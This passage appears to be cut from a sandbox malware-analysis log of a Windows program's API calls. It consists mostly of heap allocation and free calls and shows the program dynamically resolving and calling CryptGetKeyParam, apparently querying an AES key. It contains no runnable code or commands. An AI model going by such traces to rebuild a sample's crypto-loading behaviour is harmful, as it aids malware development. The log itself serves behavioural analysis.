out: hHeap=0x8a0000) returned 1 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.060] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0168.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0168.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.061] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.061] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0168.062] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0168.062] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0168.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0168.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0168.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0168.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0168.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0168.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.067] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0168.068] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0168.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: 